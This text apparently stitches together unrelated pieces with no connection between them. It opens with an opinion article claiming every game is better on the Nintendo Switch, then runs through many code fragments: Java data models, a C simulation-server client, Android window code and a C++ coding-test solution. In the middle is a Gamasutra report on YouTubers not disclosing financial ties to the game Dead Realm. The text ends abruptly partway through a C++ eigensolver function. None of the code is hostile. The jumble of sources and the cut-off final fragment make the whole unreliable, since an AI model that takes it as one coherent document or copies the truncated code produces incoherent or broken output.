"Ultra Street Fighter II" for the Nintendo Switch Capcom It turns out that "Ultra Street Fighter II," a souped-up version of the 1991 classic for the new Nintendo Switch console, is a certifiable smash hit. So far, game developer Capcom says "Ultra Street Fighter II" has sold 450,000 copies, reports IGN— despite lukewarm reviews, and the ongoing shortage of the Switch console itself. Now, Capcom says it's planning to release a flurry of new Switch games to meet this apparent demand. From my perspective as a Nintendo Switch owner, the reason for the runaway success of this game is simple: Every video game ever made is better, or would be better, on the Nintendo Switch. All of them. Full stop. Let me explain. What Nintendo does for me I own a PlayStation 4 and an Xbox One, and a whole heap of games to play on them. Still, I don't get a lot of time to play games on the TV, and when I do, it's usually for a matter of minutes, not hours. Lately, I've played many more games on my iPhone or Nintendo 3DS than my fancy-pants TV consoles. It means that critically acclaimed games like "The Witcher 3" and even the older "Skyrim" have all passed me by. They're probably both great, but I just haven't been able to commit the 40-plus hours in front of my TV that those games would demand from me for full enjoyment. Back to Nintendo. In case you haven't heard, the Nintendo Switch has a simple, killer gimmick: It's a TV console, like an Xbox or PlayStation, but when you're on the go, you can pick it up right off its dock and keep on playing. It even lets you split one controller into two, for impromptu two-player action. The Nintendo Switch can be plugged into a TV, or played on-the-go. Either way, it's great. Ben Gilbert/Business Insider This has been a huge boon for me, personally. The Switch is a TV console, and a thing I can take with me. All of a sudden, I don't have to choose between playing a console game or something portable. Console games fit into my life, once again. And I suspect that I'm not alone in feeling this way. So, yeah, of course "Ultra Street Fighter II" sold like crazy, despite being a mediocre version of a decades-old classic. And when "Skyrim," which first released in 2011, comes out for the Switch later this year, it'll probably sell like crazy, too. The Switch itself makes any game more accessible, and more playable, by virtue of sheer flexibility. (Plus, this early in a console's life cycle, people are thirsty for any half-decent game, which also helps.) Ultimately, I would urge every game developer out there to consider a Nintendo Switch version of any games they're working on, or even that they've already made. Superhero fighting game "Injustice 2," for example, would be killer on the Switch. And, look, I get that the Nintendo Switch isn't as powerful under the hood as the Xbox One or PlayStation 4, graphically. Speaking personally, though, I would rather play a version of a great game at a lower resolution, or with slightly diminished special effects, than I would not play it at all.
/** * Determines the data member path to the specified node. * * @param node The node * @return The path, not containing the name of the top level complex type item node (e. g. "Buyer.Name") * or null if the node is the root node itself */ protected String determineNodePath(ItemTreeNode node) { ItemTreeNode rootNode = (ItemTreeNode) ((DefaultTreeModel) getModel()).getRoot(); StringBuffer sb = new StringBuffer(); while (node != rootNode) { if (node instanceof ModelObjectNode) { ModelObject object = ((ModelObjectNode) node).getModelObject(); String name = object.getName(); if (sb.length() == 0) { sb.append(name); } else { sb.insert(0, ModelQualifier.OBJECT_DELIMITER); sb.insert(0, name); } } node = (ItemTreeNode) node.getParent(); } if (sb.length() == 0) return null; return sb.toString(); }
// Convert WALL4 to WALL3, or WALL1 to WALL0, etc. Leave non-walls alone.
constexpr CellState remove_wall_dep(CellState cell) {
  if (is_wall_with_deps(cell)) {
    return CellState(+cell >> 1);
  }
  return cell;
}
/* * Connect a client to the server. * This performs the following PLI client-side initialization. * * 1) Initialize a lock for PLI setreg/getreg accesses * 2) Input connection host/port information from user. * 3) Setup DMA controller task to listen (locally) on dmaPort. * 4) Setup Interrupt Controller task to listen (locally) on intPort. * 5) Register an interrupt callback routine (passed in). * 6) Setup a local socket file descriptor to communicate with * pliHost on the given pliPort. * 7) Register the client with the server on pliHost. * The server may immediately start sending DMA and INTR requests. * Return: * 0 on success, a negative value on error. */ int pli_client_attach(int devNo) { struct addrinfo *res = NULL, *rp; struct addrinfo hints; verinet_t *v = &verinet[devNo]; ipaddr_t cli_addr; socklen_t cli_addrlen; rpc_cmd_t cmd; char tmp[80], *s; int rv = -1; memset(v, 0, sizeof (*v)); v->devNo = devNo; v->sockfd = -1; v->skipTestInt = 1; v->pli_mutex = sal_mutex_create("PLI socket mutex"); s = getenv("SOC_TARGET_SERVER"); if (!s) { snprintf(tmp, sizeof(tmp), "SOC_TARGET_SERVER%d", devNo); s = getenv(tmp); } if(!s) { snprintf(tmp, sizeof(tmp), "Enter unit %d PLI server host" "name [localhost]" ": ", devNo); sal_readline(tmp, v->pliHost, sizeof (v->pliHost), 0); if (sal_strlen(v->pliHost) == 0) { sal_strncpy(v->pliHost, "localhost", sizeof(v->pliHost) - 1); } } else { if(strlen(s) >= sizeof(v->pliHost)) strncpy(v->pliHost, s, sizeof(v->pliHost) - 1); else strncpy(v->pliHost, s, strlen(s)); } s = getenv("SOC_TARGET_PORT"); if (!s) { snprintf(tmp, sizeof(tmp), "SOC_TARGET_PORT%d", devNo); s = getenv(tmp); } if(!s){ snprintf(tmp, sizeof(tmp), "Enter unit %d remote port: ", devNo); sal_readline(tmp, tmp, sizeof (tmp), "2400"); v->pliPort = atoi(tmp); s = tmp; } else v->pliPort = atoi(s); memset(&hints, 0, sizeof(hints)); hints.ai_socktype = SOCK_STREAM; hints.ai_family = AF_UNSPEC; if (getaddrinfo(v->pliHost, s, &hints, &res) != 0) { cli_out("pli_client_attach: hostname lookup failed " "for host [%s] (%s)\n", v->pliHost, strerror(errno)); goto error; } for (rp = res; rp != NULL; rp = rp->ai_next) { v->sockfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol); if (v->sockfd < 0) { continue; } #ifdef VERINET_CUSTOM_SOCKET_HOOK VERINET_CUSTOM_SOCKET_HOOK #endif if (connect(v->sockfd, rp->ai_addr, rp->ai_addrlen) == 0) { break; } close(v->sockfd); v->sockfd = -1; } if (rp == NULL) { cli_out("client_attach: could not connect unit %d to [%s.%d] (%s)\n", devNo, v->pliHost, v->pliPort, strerror(errno)); goto error; } cli_addrlen = sizeof(cli_addr); if (getsockname(v->sockfd, &cli_addr.sa, &cli_addrlen) < 0) { cli_out("client_attach: getsockname failed (%s)\n", strerror(errno)); goto error; } if (!v->jobsStarted) { if (dmac_init(v) < 0) { goto error; } if (intr_init(v) < 0) { goto error; } v->jobsStarted = 1; } if (cli_addr.sin6.sin6_family == AF_INET6) { make_rpc_register_ip6_req(&cmd, v->intPort, v->dmaPort, (uint32_t *)&cli_addr.sin6.sin6_addr); } else { make_rpc_register_req(&cmd, v->intPort, v->dmaPort, (uint32_t)cli_addr.sin.sin_addr.s_addr); } if (write_command(v->sockfd, &cmd) != RPC_OK) { cli_out("pli_client_attach: could not send REGISTER request\n"); goto error; } if (wait_command(v->sockfd, &cmd) < 0) goto error; if (cmd.opcode != RPC_REGISTER_CLIENT || cmd.status != RPC_OK) { cli_out("pli_client_attach: PLI registration failed\n"); goto error; } freeaddrinfo(res); return 0; error: if (res) { freeaddrinfo(res); } if (v->sockfd >= 0) { close(v->sockfd); v->sockfd = -1; } return 
rv; }
/** * Model definition for Precinct. * * <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is * transmitted over HTTP when working with the Google Civic Information API. For a detailed * explanation see: * <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a> * </p> * * @author Google, Inc. */ @SuppressWarnings("javadoc") public final class Precinct extends com.google.api.client.json.GenericJson { /** * ID of the AdministrationRegion message for this precinct. Corresponds to LocalityId xml tag. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String administrationRegionId; /** * ID(s) of the Contest message(s) for this precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> contestId; /** * Required. Dataset ID. What datasets our Precincts come from. * The value may be {@code null}. */ @com.google.api.client.util.Key @com.google.api.client.json.JsonString private java.lang.Long datasetId; /** * ID(s) of the PollingLocation message(s) for this precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> earlyVoteSiteId; /** * ID(s) of the ElectoralDistrict message(s) for this precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> electoralDistrictId; /** * Required. A unique identifier for this precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String id; /** * Specifies if the precinct runs mail-only elections. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean mailOnly; /** * Required. The name of the precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String name; /** * The number of the precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String number; /** * Encouraged. The OCD ID of the precinct * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> ocdId; /** * ID(s) of the PollingLocation message(s) for this precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> pollingLocationId; /** * ID(s) of the SpatialBoundary message(s) for this precinct. Used to specify a geometrical * boundary of the precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> spatialBoundaryId; /** * If present, this proto corresponds to one portion of split precinct. Other portions of this * precinct are guaranteed to have the same `name`. If not present, this proto represents a full * precicnt. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String splitName; /** * Specifies the ward the precinct is contained within. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String ward; /** * ID of the AdministrationRegion message for this precinct. Corresponds to LocalityId xml tag. * @return value or {@code null} for none */ public java.lang.String getAdministrationRegionId() { return administrationRegionId; } /** * ID of the AdministrationRegion message for this precinct. Corresponds to LocalityId xml tag. 
* @param administrationRegionId administrationRegionId or {@code null} for none */ public Precinct setAdministrationRegionId(java.lang.String administrationRegionId) { this.administrationRegionId = administrationRegionId; return this; } /** * ID(s) of the Contest message(s) for this precinct. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getContestId() { return contestId; } /** * ID(s) of the Contest message(s) for this precinct. * @param contestId contestId or {@code null} for none */ public Precinct setContestId(java.util.List<java.lang.String> contestId) { this.contestId = contestId; return this; } /** * Required. Dataset ID. What datasets our Precincts come from. * @return value or {@code null} for none */ public java.lang.Long getDatasetId() { return datasetId; } /** * Required. Dataset ID. What datasets our Precincts come from. * @param datasetId datasetId or {@code null} for none */ public Precinct setDatasetId(java.lang.Long datasetId) { this.datasetId = datasetId; return this; } /** * ID(s) of the PollingLocation message(s) for this precinct. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getEarlyVoteSiteId() { return earlyVoteSiteId; } /** * ID(s) of the PollingLocation message(s) for this precinct. * @param earlyVoteSiteId earlyVoteSiteId or {@code null} for none */ public Precinct setEarlyVoteSiteId(java.util.List<java.lang.String> earlyVoteSiteId) { this.earlyVoteSiteId = earlyVoteSiteId; return this; } /** * ID(s) of the ElectoralDistrict message(s) for this precinct. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getElectoralDistrictId() { return electoralDistrictId; } /** * ID(s) of the ElectoralDistrict message(s) for this precinct. * @param electoralDistrictId electoralDistrictId or {@code null} for none */ public Precinct setElectoralDistrictId(java.util.List<java.lang.String> electoralDistrictId) { this.electoralDistrictId = electoralDistrictId; return this; } /** * Required. A unique identifier for this precinct. * @return value or {@code null} for none */ public java.lang.String getId() { return id; } /** * Required. A unique identifier for this precinct. * @param id id or {@code null} for none */ public Precinct setId(java.lang.String id) { this.id = id; return this; } /** * Specifies if the precinct runs mail-only elections. * @return value or {@code null} for none */ public java.lang.Boolean getMailOnly() { return mailOnly; } /** * Specifies if the precinct runs mail-only elections. * @param mailOnly mailOnly or {@code null} for none */ public Precinct setMailOnly(java.lang.Boolean mailOnly) { this.mailOnly = mailOnly; return this; } /** * Required. The name of the precinct. * @return value or {@code null} for none */ public java.lang.String getName() { return name; } /** * Required. The name of the precinct. * @param name name or {@code null} for none */ public Precinct setName(java.lang.String name) { this.name = name; return this; } /** * The number of the precinct. * @return value or {@code null} for none */ public java.lang.String getNumber() { return number; } /** * The number of the precinct. * @param number number or {@code null} for none */ public Precinct setNumber(java.lang.String number) { this.number = number; return this; } /** * Encouraged. The OCD ID of the precinct * @return value or {@code null} for none */ public java.util.List<java.lang.String> getOcdId() { return ocdId; } /** * Encouraged. 
The OCD ID of the precinct * @param ocdId ocdId or {@code null} for none */ public Precinct setOcdId(java.util.List<java.lang.String> ocdId) { this.ocdId = ocdId; return this; } /** * ID(s) of the PollingLocation message(s) for this precinct. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getPollingLocationId() { return pollingLocationId; } /** * ID(s) of the PollingLocation message(s) for this precinct. * @param pollingLocationId pollingLocationId or {@code null} for none */ public Precinct setPollingLocationId(java.util.List<java.lang.String> pollingLocationId) { this.pollingLocationId = pollingLocationId; return this; } /** * ID(s) of the SpatialBoundary message(s) for this precinct. Used to specify a geometrical * boundary of the precinct. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getSpatialBoundaryId() { return spatialBoundaryId; } /** * ID(s) of the SpatialBoundary message(s) for this precinct. Used to specify a geometrical * boundary of the precinct. * @param spatialBoundaryId spatialBoundaryId or {@code null} for none */ public Precinct setSpatialBoundaryId(java.util.List<java.lang.String> spatialBoundaryId) { this.spatialBoundaryId = spatialBoundaryId; return this; } /** * If present, this proto corresponds to one portion of split precinct. Other portions of this * precinct are guaranteed to have the same `name`. If not present, this proto represents a full * precicnt. * @return value or {@code null} for none */ public java.lang.String getSplitName() { return splitName; } /** * If present, this proto corresponds to one portion of split precinct. Other portions of this * precinct are guaranteed to have the same `name`. If not present, this proto represents a full * precicnt. * @param splitName splitName or {@code null} for none */ public Precinct setSplitName(java.lang.String splitName) { this.splitName = splitName; return this; } /** * Specifies the ward the precinct is contained within. * @return value or {@code null} for none */ public java.lang.String getWard() { return ward; } /** * Specifies the ward the precinct is contained within. * @param ward ward or {@code null} for none */ public Precinct setWard(java.lang.String ward) { this.ward = ward; return this; } @Override public Precinct set(String fieldName, Object value) { return (Precinct) super.set(fieldName, value); } @Override public Precinct clone() { return (Precinct) super.clone(); } }
A few weeks ago a multiplayer horror game, Section Studios' Dead Realm, was released on Steam's Early Access service and quickly rose to (briefly) become one of its top sellers. (According to SteamSpy, it's sold 70,000 units at $15, and it's undoubtedly a satisfying game, given almost 1,500 reviews averaging 'Very Positive'). In particular, the game has proven popular among YouTubers, in part because it's explicitly designed to be played in front of an audience. "We developed this game to not only be fun to play, but also fun to watch," reads an excerpt of the game's description on Steam. The rise of YouTubers has definitely affected how many developers make games, but Dead Realm is a special case: it's published by 3BlackDot, the "influencer-driven" entertainment startup founded last year by ex-Machinima staffers in conjunction with YouTubers Tom "Syndicate" Cassell and Adam "SeaNanners" Montoya. This is important because both Syndicate and SeaNanners have published multiple videos of themselves excitedly playing Dead Realm without clearly disclosing their financial ties to the game's publisher, seemingly defying the FTC's strict guidelines for how YouTubers should disclose paid endorsements (coincidentally, the UK Committee of Advertising Practices published a similar set of revised guidelines this week in an effort to enforce transparency among YouTubers producing advertorial videos.) Gamasutra has contacted multiple 3BlackDot representatives to verify whether or not the company is aware of the FTC's expectations and ascertain whether it has any plans to comply, but received no direct response to that question. "If an ad features an endorser who’s a relative or employee of the marketer, the ad is misleading unless the connection is made clear," reads the FTC's endorsement guide. "The reason is obvious: Knowing about the connection is important information for anyone evaluating the endorsement." It may well be an honest oversight. The FTC's revised disclosure guidelines for YouTubers are relatively new, as is the fact that Let's Play videos can serve as effective ads for games, and both Cassell and Montoya have previously published videos (albeit weeks or months ago) in which they speak briefly about being involved in the development of Dead Realm. Moreover, in direct communications about Dead Realm 3BlackDot proudly touts the YouTubers' involvement. Gamasutra received an email from a company representative this week that read, in part, "Evan Fong (VanossGaming – 13.7 million subscribers), Tom Cassell (TheSyndicateProject – 9.1 million subscribers) and Adam Montoya (SeaNanners – 5.4 million subscribers), all partners and co-creators at 3BD, joined forces to create the first multiplayer PC game that was created by an influencer network specifically for the YouTube community." (It then goes on to tout the number of unique views YouTube videos made about the game have garnered since its release, "all with zero marketing spend.") While each of the aforementioned YouTubers has published multiple Dead Realm Let's Play videos, only Fong appears to have made any attempt at disclosing his ties to the game in post-release videos -- and only implicitly, in a text description on his first Dead Realm video that reads (in part) "We will also be releasing new ghost characters, human characters, and maps as time goes on...Thanks for all your support." Even that probably doesn't cut it, from a federal standpoint. 
When Gamasutra spoke to FTC representative Mary Engle last year amid concerns that some popular YouTubers were accepting money to play or review games in their videos without disclosure, she made it clear that the commission expects "... disclosure should be clear and conspicuous, and should be upfront and easy to see where the viewer won't miss it." Failure to do so is grounds for an FTC investigation, which could lead to a lawsuit; the FTC recently compelled Sony to pay refunds over misleading Vita ads and barred employees of its marketing firm partner, Deutsch LA, from misleading consumers with product endorsements on social networks without clearly disclosing their financial ties to the product. This isn't the first time that 3BlackDot YouTubers have failed to clearly disclose financial ties to the products they play, either. When Gamasutra spoke to company co-founders Luke Stepleton and Angelo Pullen last year, Stepleton said that transparency was "not an issue" and that company representatives would clearly disclose all paid videos. "Adam and Tom have done a brand integration for Disney Infinity. It's very clear when you watch the video, they're saying, 'Hey guys, Disney asked me to do this video,'" Stepleton said. "It's clear they're working with the brand to market or promote." Gamasutra then promptly watched those videos and never heard either YouTuber say 'Hey guys, Disney asked me to do this video,' nor give any clear indication they'd been paid to produce the "brand integration" videos -- only that they'd been invited to play the game early. 3BlackDot's established disregard for being transparent about its YouTubers' business arrangements is doubly troubling because complying with FTC expectations (by, say, adding a line of text or a graphic that clearly states "I had a hand in making this game" to these videos) probably won't make these videos any less appealing, but failing to do so potentially damages the credibility of YouTubers as a whole.
/**
 * This test and DummyBaseCloneTest make sure that two TestBase classes can be executed in the same suite -
 * in particular, it makes sure that Explore is working properly.
 */
public class DummyBaseTestRun extends TestFrameworkTestBase {

  @Test
  public void test() throws Exception {
    deployApplication(DummyApp.class);

    Connection connection = getQueryClient();
    try {
      Set<String> tables = Sets.newHashSet();
      ResultSet resultSet = connection.prepareStatement("show tables").executeQuery();
      try {
        while (resultSet.next()) {
          tables.add(resultSet.getString(1));
        }
      } finally {
        resultSet.close();
      }

      // Since this test can run in a suite that may contain other tests,
      // intersect with the expected set to avoid seeing tables created by other tests.
      Set<String> expected = Sets.newHashSet("dataset_whom");
      Assert.assertEquals(expected, Sets.intersection(expected, tables));
    } finally {
      connection.close();
    }
  }
}
/** * Properties of entity Aqi.<br/> * Can be used for QueryBuilder and for referencing column names. */ public static class Properties { public final static Property Areaid = new Property(0, String.class, "areaid", false, "AREAID"); public final static Property Aqi = new Property(1, Integer.class, "aqi", false, "AQI"); public final static Property Quality = new Property(2, String.class, "quality", false, "QUALITY"); public final static Property Pm2_5 = new Property(3, Integer.class, "pm2_5", false, "PM2_5"); public final static Property Pm10 = new Property(4, Integer.class, "pm10", false, "PM10"); public final static Property So2 = new Property(5, Integer.class, "so2", false, "SO2"); public final static Property No2 = new Property(6, Integer.class, "no2", false, "NO2"); }
def canceled_sessions_chart(self):
    context = {}
    where_clause = '''WHERE ((session.state_id is null AND session.canceled=True)
                      OR (session.state_id is not null
                          AND session.last_modified < (NOW() - INTERVAL '24 hour')))'''
    with connection.cursor() as cursor:
        web_where_clause = where_clause + " AND connection.identity LIKE 'web-%'"
        query = self.query_for_session_data.format(state_type='state_at_close_id',
                                                   where_clause=web_where_clause)
        web_canceled_sessions_chart, web_canceled_sessions_map = prepare_data(cursor, query)
        context['web_canceled_sessions_chart'] = web_canceled_sessions_chart
        context['web_canceled_sessions_map'] = web_canceled_sessions_map

        sms_where_clause = where_clause + " AND connection.identity NOT LIKE 'web-%'"
        query = self.query_for_session_data.format(state_type='state_at_close_id',
                                                   where_clause=sms_where_clause)
        sms_canceled_sessions_chart, sms_canceled_sessions_map = prepare_data(cursor, query)
        context['sms_canceled_sessions_chart'] = sms_canceled_sessions_chart
        context['sms_canceled_sessions_map'] = sms_canceled_sessions_map
    return context
def XMLToPython(pattern):
    assert isinstance(pattern, six.text_type)
    py_pattern, position = _MatchSubRegex(pattern, 0)
    if position != len(pattern):
        raise RegularExpressionError()
    return six.u("^%s$") % (py_pattern,)
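A quick behavioral sketch, assuming _MatchSubRegex translates an XSD regular expression body into its Python equivalent (the exact translated form of any given construct is not verified here):

# Hypothetical usage: XSD patterns implicitly match the whole lexical value,
# so the translated Python pattern comes back anchored with ^ and $.
import re
py_re = XMLToPython(six.u(r'[A-Z]{2}[0-9]+'))
compiled = re.compile(py_re)
assert compiled.match(u'AB123')       # whole-string match succeeds
assert not compiled.match(u'xAB123')  # anchored, so a leading character fails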
/** * Call after invoking {@link WindowContainer#prepareSurfaces} on children as * described in {@link #resetDimStates}. * * @param t A transaction in which to update the dims. * @param bounds The bounds at which to dim. * @return true if any Dims were updated. */ boolean updateDims(SurfaceControl.Transaction t, Rect bounds) { if (mDimState == null) { return false; } if (!mDimState.mDimming) { if (!mDimState.mAnimateExit) { if (mDimState.mDimLayer.isValid()) { t.remove(mDimState.mDimLayer); } } else { startDimExit(mLastRequestedDimContainer, mDimState.mSurfaceAnimator, t); } mDimState = null; return false; } else { t.setPosition(mDimState.mDimLayer, bounds.left, bounds.top); t.setWindowCrop(mDimState.mDimLayer, bounds.width(), bounds.height()); if (!mDimState.isVisible) { mDimState.isVisible = true; t.show(mDimState.mDimLayer); startDimEnter(mLastRequestedDimContainer, mDimState.mSurfaceAnimator, t); } return true; } }
/**
 * <p>Title : RpcClientProxy </p>
 * <p>Description : </p>
 *
 * @author huifer
 * @date 2019-06-11
 */
public class RpcClientProxy {

    /**
     * RPC client.
     *
     * @param interfaceCls the service interface, e.g. {@link com.huifer.rmi.rpc.HelloService}
     * @param host host
     * @param port port
     * @return a HelloService-style proxy object
     */
    public <T> T clientProxy(final Class<T> interfaceCls, final String host, final int port) {
        return (T) Proxy.newProxyInstance(interfaceCls.getClassLoader(),
                new Class[]{interfaceCls},
                new RemoteInvocationHandler(host, port));
    }
}
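A minimal usage sketch for the proxy above. The host, port, and the hello(...) method are hypothetical; they assume a matching RPC server is already listening and that HelloService declares such a method:

public class RpcClientDemo {
    public static void main(String[] args) {
        RpcClientProxy proxy = new RpcClientProxy();
        // Obtain a dynamic proxy; every method call is routed through RemoteInvocationHandler.
        HelloService hello = proxy.clientProxy(HelloService.class, "127.0.0.1", 8888);
        // Invoking an interface method triggers a remote call over the socket.
        System.out.println(hello.hello("world"));
    }
}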
/** * The <code>DispatcherSyntheticResource</code> extends the * <code>SyntheticResource</code> class overwriting the * {@link #getResourceSuperType()} method to provide a possibly non- * <code>null</code> result. */ private static class DispatcherSyntheticResource extends SyntheticResource { public DispatcherSyntheticResource(ResourceResolver resourceResolver, String path, String resourceType) { super(resourceResolver, path, resourceType); } @Override public String getResourceSuperType() { return ResourceUtil.getResourceSuperType(getResourceResolver(), getResourceType()); } }
/** * Clears a subtree rooted at the node with the given id that is * hosted in a given window. * * @param windowId The id of the hosting window. * @param rootNodeId The root id. */ private void clearSubTreeLocked(int windowId, long rootNodeId) { if (DEBUG) { Log.i(LOG_TAG, "Clearing cached subtree."); } LongSparseArray<AccessibilityNodeInfo> nodes = mNodeCache.get(windowId); if (nodes != null) { clearSubTreeRecursiveLocked(nodes, rootNodeId); } }
// Google/OnlineRound19/B.cpp
#include <iostream>
#include <regex>
#include <string>
#include <vector>
#include <sstream>

using namespace std;

// Returns true if A > B
bool compare(vector<int> &A, vector<int> &B) {
    for (int i = 0; i < A.size(); i++) {
        if (A[i] > B[i]) {
            return true;
        } else if (A[i] < B[i]) {
            return false;
        }
        // Otherwise continue
    }
    // If the function reaches here, both arrays are equal. However, since the
    // elements are distinct, this will not happen.
    return false;
}

// O(N*K) solution where N = A.size()
vector<int> solution(vector<int> A, int K) {
    // Current maximum initialised to the first K elements of array A
    vector<int> cur_max;
    for (int i = 0; i < K; i++) {
        cur_max.push_back(A[i]);
    }
    // left and right are the first and last indices of the K-sized subarray
    for (int left = 1; left < A.size() - K + 1; left++) {
        int right = left + K - 1;
        vector<int> temp;
        for (int j = left; j <= right; j++) {
            temp.push_back(A[j]);
        }
        if (compare(temp, cur_max)) {
            // Update cur_max as temp > cur_max
            cur_max = temp;
        }
    }
    return cur_max;
}

vector<int> toIntVector(string str) {
    std::vector<int> out;
    std::string i;
    std::istringstream tokenStream(str);
    while (std::getline(tokenStream, i, ',')) {
        out.push_back(atoi(i.c_str()));
    }
    return out;
}

string fromIntVector(vector<int> arr) {
    string out = "";
    for (int i = 0; i < arr.size(); i++) {
        out += to_string(arr[i]);
        if (i != arr.size() - 1) {
            out += ",";
        }
    }
    return out;
}

int main() {
    // Read from stdin, solve the problem, write answer to stdout.
    string arrS;
    int K;
    cin >> arrS >> K;
    vector<int> N = toIntVector(arrS);
    cout << fromIntVector(solution(N, K));
}

/*
Array X is greater than array Y if the first non-matching element in both arrays
has a greater value in X than in Y. For example, for arrays X and Y such that:

  X = [1, 2, 4, 3, 5]
  Y = [1, 2, 3, 4, 5]

X is greater than Y because the first element that does not match is larger in X
(i.e. for X[2] and Y[2], X[2] > Y[2]).

A contiguous subarray is defined by an interval of the indices. In other words,
a contiguous subarray is a subarray which has consecutive indexes.

Write a function that, given a zero-indexed array A consisting of N integers and
an integer K, returns the largest contiguous subarray of length K from all the
contiguous subarrays of length K. For example, given array A and K = 4 such that:

  A = [1, 4, 3, 2, 5]

the function should return [4, 3, 2, 5], because there are two subarrays of size 4:

  [1, 4, 3, 2]
  [4, 3, 2, 5]

and the largest subarray is [4, 3, 2, 5].

Assume that:
  1 <= K <= N <= 100;
  1 <= A[J] <= 1000;
  the array A contains N distinct integers.

In your solution, focus on correctness. The performance of your solution will
not be the primary focus of the assessment.
*/
/** * <p> * An abstract base class for a {@link NodeHandler} implementation for {@link ImmutableNode} objects. * </p> * <p> * This class already implements all methods which need no other information than the passed in node object. * Functionality which requires additional state (e.g. querying the root node or a parent node) has to be added by * concrete sub classes. * </p> * * @since 2.0 */ abstract class AbstractImmutableNodeHandler implements NodeHandler<ImmutableNode> { @Override public String nodeName(final ImmutableNode node) { return node.getNodeName(); } @Override public Object getValue(final ImmutableNode node) { return node.getValue(); } @Override public List<ImmutableNode> getChildren(final ImmutableNode node) { return node.getChildren(); } @Override public <C> int getMatchingChildrenCount(final ImmutableNode node, final NodeMatcher<C> matcher, final C criterion) { return getMatchingChildren(node, matcher, criterion).size(); } /** * {@inheritDoc} This implementation returns an immutable list with all child nodes accepted by the specified matcher. */ @Override public <C> List<ImmutableNode> getMatchingChildren(final ImmutableNode node, final NodeMatcher<C> matcher, final C criterion) { final List<ImmutableNode> result = new ArrayList<>(node.getChildren().size()); for (final ImmutableNode c : node) { if (matcher.matches(c, this, criterion)) { result.add(c); } } return Collections.unmodifiableList(result); } /** * {@inheritDoc} This implementation returns an immutable list with all child nodes that have the specified name. */ @Override public List<ImmutableNode> getChildren(final ImmutableNode node, final String name) { return getMatchingChildren(node, NodeNameMatchers.EQUALS, name); } @Override public ImmutableNode getChild(final ImmutableNode node, final int index) { return node.getChildren().get(index); } @Override public int indexOfChild(final ImmutableNode parent, final ImmutableNode child) { return parent.getChildren().indexOf(child); } @Override public int getChildrenCount(final ImmutableNode node, final String name) { if (name == null) { return node.getChildren().size(); } return getMatchingChildrenCount(node, NodeNameMatchers.EQUALS, name); } @Override public Set<String> getAttributes(final ImmutableNode node) { return node.getAttributes().keySet(); } @Override public boolean hasAttributes(final ImmutableNode node) { return !node.getAttributes().isEmpty(); } @Override public Object getAttributeValue(final ImmutableNode node, final String name) { return node.getAttributes().get(name); } /** * {@inheritDoc} This implementation assumes that a node is defined if it has a value or has children or has attributes. */ @Override public boolean isDefined(final ImmutableNode node) { return AbstractImmutableNodeHandler.checkIfNodeDefined(node); } /** * Checks if the passed in node is defined. Result is <b>true</b> if the node contains any data. * * @param node the node in question * @return <b>true</b> if the node is defined, <b>false</b> otherwise */ static boolean checkIfNodeDefined(final ImmutableNode node) { return node.getValue() != null || !node.getChildren().isEmpty() || !node.getAttributes().isEmpty(); } }
def rand_int(*shape):
    res = np.random.randint(low=1, high=5, size=shape)
    if isinstance(res, np.ndarray):
        return res.astype(np.float32)
    return float(res)
/// Creates a random [`Ulid`] with the current timestamp, using a custom source of randomness. pub fn from_rng<R: Rng + ?Sized>(rng: &mut R) -> Self { // get the timestamp portion of the ulid let millis = Utc::now().timestamp_millis(); // create the buffer holding the raw bytes let mut buf = [0; 16]; // write the timestamp section into the buffer BigEndian::write_i48(&mut buf, millis); // fill the rest of the buffer with random bytes rng.fill(&mut buf[6..]); // construct the resulting ulid Ulid(buf) }
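A brief usage sketch, assuming the rand crate is in scope (the thread-local RNG here is just one possible randomness source):

// Hypothetical call site: any type implementing `rand::Rng` works.
fn example() {
    let mut rng = rand::thread_rng();
    let ulid = Ulid::from_rng(&mut rng);
    // The first 6 bytes encode the millisecond timestamp; the last 10 are random.
    let _ = ulid;
}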
#include "eigs.h" #include "cotmatrix.h" #include "sort.h" #include "slice.h" #include "massmatrix.h" #include <iostream> template < typename Atype, typename Btype, typename DerivedU, typename DerivedS> IGL_INLINE bool igl::eigs( const Eigen::SparseMatrix<Atype> & A, const Eigen::SparseMatrix<Btype> & iB, const size_t k, const EigsType type, Eigen::PlainObjectBase<DerivedU> & sU, Eigen::PlainObjectBase<DerivedS> & sS) { using namespace Eigen; using namespace std; const size_t n = A.rows(); assert(A.cols() == n && "A should be square."); assert(iB.rows() == n && "B should be match A's dims."); assert(iB.cols() == n && "B should be square."); assert(type == EIGS_TYPE_SM && "Only low frequencies are supported"); DerivedU U(n,k); DerivedS S(k,1); typedef Atype Scalar; typedef Eigen::Matrix<typename DerivedU::Scalar,DerivedU::RowsAtCompileTime,1> VectorXS; // Rescale B for better numerics const Scalar rescale = std::abs(iB.diagonal().maxCoeff()); const Eigen::SparseMatrix<Btype> B = iB/rescale; Scalar tol = 1e-4; Scalar conv = 1e-14; int max_iter = 100; int i = 0; while(true) { // Random initial guess VectorXS y = VectorXS::Random(n,1); Scalar eff_sigma = 0; if(i>0) { eff_sigma = 1e-8+std::abs(S(i-1)); } // whether to use rayleigh quotient method bool ray = false; Scalar err = std::numeric_limits<Scalar>::infinity(); int iter; Scalar sigma = std::numeric_limits<Scalar>::infinity(); VectorXS 